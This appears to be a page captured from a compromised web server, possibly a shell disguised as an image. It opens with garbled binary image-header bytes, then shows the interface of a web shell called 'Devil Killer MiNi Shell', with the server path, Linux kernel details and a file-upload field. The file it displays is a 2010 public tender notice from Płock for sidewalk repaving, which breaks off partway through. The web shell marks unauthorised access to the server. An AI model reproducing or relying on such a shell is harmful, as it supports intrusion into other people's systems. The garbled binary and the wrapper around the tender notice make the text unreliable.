JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100723/197015-N-2010.html

<p class="kh_header"><b>Płock: Wykonanie wymiany nawierzchni chodnikowej we wnętrzach osiedlowych na terenach gminnych</b><br>
<b>Numer ogłoszenia: 197015 - 2010; data zamieszczenia: 23.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 024 3640310, faks 024 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wymiany nawierzchni chodnikowej we wnętrzach osiedlowych na terenach gminnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont nawierzchni chodnikowych na terenach gminnych z podziałem na następujące części:
1.      Wymiana nawierzchni chodnikowej z płytek betonowych na nawierzchnię z kostki brukowej betonowej między ulicami Słodową i Bartniczą na działce 694/65 (mapka nr 1) - Część I.
2.      Wymiana nawierzchni chodnikowej z płytek betonowych na nawierzchnię z kostki brukowej betonowej wzdłuż budynku Bartnicza 7 między chodnikiem przy basenie przy ul. Kobylińskiego do remontowanej w roku 2010 przez MZD ulicy Bartniczej na działce 694/65 (mapka nr 2) - Część II.
3.      Wymiana nawierzchni chodnikowej z asfaltobetonu na kostkę brukową betonową wzdłuż budynków Gałczyńskiego 18/1 i 20/1 na działce 363/13  (mapka nr 3) - Część III.
4.      Wymiana chodników z płytek betonowych na nawierzchnię z kostki brukowej betonowej przy budynkach Kochanowskiego 25,27,Bielska 38 na działkach 2/5, 2/6, 2/7 i 2/8  (mapka nr 4) - Część IV.
5.      Wymiana nawierzchni chodnikowej wzdłuż budynku Wschodnia 14 do budynku Żwirki Wigury 3 na działce 74/1 i 68/2 ( mapka nr 5) - Część V.
2. Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.  Zachowania przepisów BHP,
2.Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępując do  przetargu jest zobowiązany wnieść wadium na każdą Część zamówienia  w wysokości:
Część I 	   1.300,00  zł   (słownie: jeden tysiąc trzysta złotych)
Część II 	      750,00  zł   (słownie: siedemset pięćdziesiąt złotych)
Część III    1.250,00  zł  (słownie: jeden tysiąc dwieście pięćdziesiąt  złotych)
Część IV       900,00  zł   (słownie: dziewięćset złotych)
Część V	    1.150,00 zł   (słownie: jeden tysiąc sto pięćdziesiąt złotych)

2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz U. Nr 109, poz.
 1158 z późn. zm.).
Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy MZGM - TBS sp. z o.o. w Banku PKO Bank Polski S.A. 2 Oddział w Płocku Nr konta: 30 1020 3974 0000 5402 0098 2272

Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdują się na koncie Zamawiającego w terminie /godzina / składania ofert.

4.Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia zostanie wykluczony z przedmiotowego postępowania na podstawie art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych. 
5.Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.
6.Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.10
7.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy  w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem składania ofert.
9.Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie  pkt. 6 jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn
 nieleżących po jego stronie.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykonali w ciągu ostatnich pięciu lat (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną (na każdą część zamówienia oddzielnie) w zakresie napraw i remontów nawierzchni chodnikowych - stanowiącej przedmiot zamówienia oraz o wartości co najmniej na każdą część zamówienia jak niżej:
Część I - 30.000,00 zł
Część II - 30.000,00 zł
Częsć III - 30.000,00 zł
Część IV - 30.000,00 zł
Część V - 30.000,00 zł

wraz z załączonymi dokumentami potwierdzającymi, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
Zamawiający dopuszcza możliwość wykazania się jedną robotą odpowiadającą zsumowanym wartościom w ramach wybranych Części. W tym przypadku wykonawca wykazuje powyższą robotę w każdym Załączniku - Wykaz robót dla wybranych Części.Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie dokumentów złożonych przez wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą (przychód) z działalności operacyjnej za okres ostatnich dwóch lat obrotowych, tj. za lata 2008 i 2009, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres nie niższy niż przewidywana
wartość wykonywanych usług za każdy rok oddzielnie zaproponowana w formularzu oferty przez Wykonawcę.Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia/nie spełnia), na podstawie dokumentów złożonych przez wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 2 lata obrotowe</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock p. 3-4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2010 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock Kancelaria p. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Słodowa, Bartnicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont nawierzchni chodnikowych na terenach gminnych z podziałem na następujące części:
1.      Wymiana nawierzchni chodnikowej z płytek betonowych na nawierzchnię z kostki brukowej betonowej między ulicami Słodową  i Bartniczą na działce 694/65 (mapka nr 1) - Część I.
Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.      Zachowania przepisów BHP,
2.      Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bartnicza 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana nawierzchni chodnikowej z płytek betonowych na nawierzchnię z kostki brukowej betonowej wzdłuż budynku Bartnicza 7 między chodnikiem przy basenie przy ul. Kobylińskiego do remontowanej w roku 2010 przez MZD ulicy Bartniczej na działce 694/65 (mapka nr 2) - Część II.
Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.      Zachowania przepisów BHP,
2.      Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Gałczyńskiego 18/1 i 20/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana nawierzchni chodnikowej z asfaltobetonu na kostkę brukową betonową wzdłuż budynków Gałczyńskiego 18/1 i 20/1 na działce 363/13  (mapka nr 3) - Część III.
Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
1.ręczne rozebranie nawierzchni z płytek chodnikowych, krawężników, elementów konstrukcji betonowej  i obrzeży betonowych 
2. podbudowę z pospólki pod kostkę betonową 
3. nawierzchnię z kostki brukowej betonowej grubości 6 cm na podsypce cemontowo - piaskowej 
4. prace związanych z montażem obrzeży chodnikowych wibroprasowanych i krawężników
5. regulację pionową istniejących studzienek
6. wywozu gruzu 
Szczegółowy zakres dla każdej części obejmujący przedmiar robót zawarty jest w kosztorysach inwestorskich.
W ramach zamówienia wykonawca zobowiązany jest także do :
1.      Zachowania przepisów BHP,
2.      Wykonawca jako wytwórca odpadów powstających w trakcie trwania realizacji zadania odpowiada za ich składowanie oraz  w razie konieczności powinien uregulować stan formalno-prawny   w zakresie gospodarki odpadami (art. 17 ustawy z dnia 27 kwietnia 2001r. o odpadach Dz. U. Nr 62 poz. 628 z późn. Zmianami),
Przepisy związane
- Ustawa z dnia 07.07.1994 r. - Prawo Budowlane.
- Rozporządzenie Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i   higieny pracy podczas wykonywania robót budowlanych.
Wszystkie roboty należy wykonywać zgodnie z obowiązującymi w Polsce normami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kochanowskiego 25,27,Bielska 38.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana chodników z płytek betonowych na nawierzchnię z kostki brukowej betonowej przy budynkach Kochanowskiego 25,27,Bielska 38 na działkach 2/5, 2/6, 2/7 i 2/8  (mapka nr 4) - Część IV.
Zakres robót
Roboty, których dotyczy specyfikacja, obejmują wszystkie czynności umożliwiające i mające na celu wykonanie robót związanych z remontem chodników na terenach gminnych 
Do wykonania zadań należy wykonać:
